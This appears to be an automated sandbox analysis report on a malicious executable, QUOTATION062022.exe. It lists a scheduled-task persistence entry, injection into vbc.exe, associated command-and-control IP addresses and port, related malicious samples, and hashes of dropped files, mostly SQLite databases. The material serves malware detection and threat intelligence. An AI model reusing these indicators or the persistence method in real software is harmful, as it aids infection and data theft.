                                                                                    05:28:30Task SchedulerRun new task: Nafifas path: "C:\Users\user\AppData\Roaming\Data\Data.exe"
                                                                                    05:28:51API Interceptor234x Sleep call for process: vbc.exe modified
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    185.222.58.90QUOTATION 061622.exeGet hashmaliciousBrowse
                                                                                    • 185.222.58.90:17910/
                                                                                    SecuriteInfo.com.Variant.MSILHeracles.37401.28222.exeGet hashmaliciousBrowse
                                                                                    • 185.222.58.90:17910/
                                                                                    RFQ - FYKS - 06052022.exeGet hashmaliciousBrowse
                                                                                    • 185.222.58.90:17910/
                                                                                    MACHINE SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                                                    • 185.222.58.90:17910/
                                                                                    MACHINE SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                                                    • 185.222.58.90:17910/
                                                                                    No context
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    ROOTLAYERNETNLSipari#U015f -16 0652022 _June 2022,pfd.exeGet hashmaliciousBrowse
                                                                                    • 185.222.57.197
                                                                                    SecuriteInfo.com.W32.AIDetect.malware2.21664.exeGet hashmaliciousBrowse
                                                                                    • 185.222.57.197
                                                                                    QUOTATION 061622.exeGet hashmaliciousBrowse
                                                                                    • 185.222.58.90
                                                                                    vbc.exeGet hashmaliciousBrowse
                                                                                    • 185.222.57.197
                                                                                    SOA.exeGet hashmaliciousBrowse
                                                                                    • 185.222.57.146
                                                                                    0123987INMWN2987.jsGet hashmaliciousBrowse
                                                                                    • 45.137.22.152
                                                                                    L4aghbwCQr54nW4.exeGet hashmaliciousBrowse
                                                                                    • 45.137.22.152
                                                                                    Order Enquiry.exeGet hashmaliciousBrowse
                                                                                    • 185.222.57.173
                                                                                    Quotation.exeGet hashmaliciousBrowse
                                                                                    • 45.137.22.40
                                                                                    CCMWZuN3YWHECys.exeGet hashmaliciousBrowse
                                                                                    • 45.137.22.152
                                                                                    SecuriteInfo.com.Trojan005944781.27289.exeGet hashmaliciousBrowse
                                                                                    • 185.222.57.197
                                                                                    vqalfhePHx.exeGet hashmaliciousBrowse
                                                                                    • 45.137.22.237
                                                                                    PyS0mctVfI.exeGet hashmaliciousBrowse
                                                                                    • 45.137.22.237
                                                                                    Yeni sipari#U015f _No.129099, pdf.exeGet hashmaliciousBrowse
                                                                                    • 185.222.57.197
                                                                                    ldzOp71fAH.exeGet hashmaliciousBrowse
                                                                                    • 185.222.57.197
                                                                                    INV198763.jsGet hashmaliciousBrowse
                                                                                    • 45.137.22.152
                                                                                    LR7AKSMQhc.exeGet hashmaliciousBrowse
                                                                                    • 45.137.22.237
                                                                                    Quotation.exeGet hashmaliciousBrowse
                                                                                    • 45.137.22.40
                                                                                    INVZ678765340.jsGet hashmaliciousBrowse
                                                                                    • 45.137.22.72
                                                                                    Bestellung -20162022 _June 2022,pdf.exeGet hashmaliciousBrowse
                                                                                    • 185.222.57.197
                                                                                    No context
                                                                                    No context
                                                                                    Process:C:\Users\user\AppData\Roaming\Data\Data.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):520
                                                                                    Entropy (8bit):5.345981753770044
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:Q3La/KDLI4MWuPk21rkvoDLI4MWuCOKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks29E4KnKDE4KhK3VZ9pKhk
                                                                                    MD5:CB16F02E4CEFD4F305114A67B4865184
                                                                                    SHA1:7A481FAE100B554EB754816608A7776954863CFF
                                                                                    SHA-256:0428AA69397DC9399FEBFB4293F8FD06202C8A3C2E9B3F841EBA2DE87DB9FC25
                                                                                    SHA-512:1F96226886924B2F33578AB5F2B1306A77925FB86AC05615565C3F4EF7D93DB40F9ADD05CDA7F5435DEF58D1FEA1A33473EDDDAFFB0AF8161E73BC7CDBEAEF47
                                                                                    Malicious:false
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
                                                                                    Process:C:\Users\user\Desktop\QUOTATION062022.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):520
                                                                                    Entropy (8bit):5.345981753770044
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:Q3La/KDLI4MWuPk21rkvoDLI4MWuCOKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks29E4KnKDE4KhK3VZ9pKhk
                                                                                    MD5:CB16F02E4CEFD4F305114A67B4865184
                                                                                    SHA1:7A481FAE100B554EB754816608A7776954863CFF
                                                                                    SHA-256:0428AA69397DC9399FEBFB4293F8FD06202C8A3C2E9B3F841EBA2DE87DB9FC25
                                                                                    SHA-512:1F96226886924B2F33578AB5F2B1306A77925FB86AC05615565C3F4EF7D93DB40F9ADD05CDA7F5435DEF58D1FEA1A33473EDDDAFFB0AF8161E73BC7CDBEAEF47
                                                                                    Malicious:true
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):2502
                                                                                    Entropy (8bit):5.3347050065951125
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:MOfHK5HKXAHKdHKBSTHaAHKzvRYHKhQnoPtHoxHImHKhBHKoHaHZHAHDJHjHKoLK:vq5qXAqdqslqzJYqhQnoPtIxHbqLqo6d
                                                                                    MD5:44A99103902115000FEE31833EEF1EC7
                                                                                    SHA1:8A5D9F44EEDDB720DA442547F396ED61378DC5CF
                                                                                    SHA-256:E1CDCE73432C1A13E0C2C29AA9DD3282DC9C6CC07262AEFEFBC0BC0BF13A7039
                                                                                    SHA-512:89C217C56022C88F94B813A81E83800B9D5D4779364E1E40D3C892100AEBAC9ACA75F9E767B6C003D88399A462830FE6973F7D611595ADFAAEBE8D39723A37F0
                                                                                    Malicious:false
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                    Category:dropped
                                                                                    Size (bytes):73728
                                                                                    Entropy (8bit):1.1874185457069584
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                    MD5:72A43D390E478BA9664F03951692D109
                                                                                    SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                    SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                    SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                    Category:dropped
                                                                                    Size (bytes):73728
                                                                                    Entropy (8bit):1.1874185457069584
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                    MD5:72A43D390E478BA9664F03951692D109
                                                                                    SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                    SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                    SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                    Category:dropped
                                                                                    Size (bytes):73728
                                                                                    Entropy (8bit):1.1874185457069584
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                    MD5:72A43D390E478BA9664F03951692D109
                                                                                    SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                    SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                    SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                    Category:dropped
                                                                                    Size (bytes):73728
                                                                                    Entropy (8bit):1.1874185457069584
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                    MD5:72A43D390E478BA9664F03951692D109
                                                                                    SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                    SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                    SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                    Category:dropped
                                                                                    Size (bytes):20480
                                                                                    Entropy (8bit):0.6970840431455908
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                    MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                    SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                                    SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                    SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                    Category:dropped
                                                                                    Size (bytes):40960
                                                                                    Entropy (8bit):0.792852251086831
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                    MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                    SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                    SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                    SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                    Category:dropped
                                                                                    Size (bytes):73728
                                                                                    Entropy (8bit):1.1874185457069584
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                    MD5:72A43D390E478BA9664F03951692D109
                                                                                    SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                    SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                    SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                    Category:dropped
                                                                                    Size (bytes):73728
                                                                                    Entropy (8bit):1.1874185457069584
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                    MD5:72A43D390E478BA9664F03951692D109
                                                                                    SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                    SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                    SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                    Category:dropped
                                                                                    Size (bytes):73728
                                                                                    Entropy (8bit):1.1874185457069584
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                    MD5:72A43D390E478BA9664F03951692D109
                                                                                    SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                    SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                    SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                    Category:dropped
                                                                                    Size (bytes):73728
                                                                                    Entropy (8bit):1.1874185457069584
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                    MD5:72A43D390E478BA9664F03951692D109
                                                                                    SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                    SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                    SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                    Category:dropped
                                                                                    Size (bytes):73728
                                                                                    Entropy (8bit):1.1874185457069584
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                    MD5:72A43D390E478BA9664F03951692D109
                                                                                    SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                    SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                    SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ .......$..................................................................C.........................................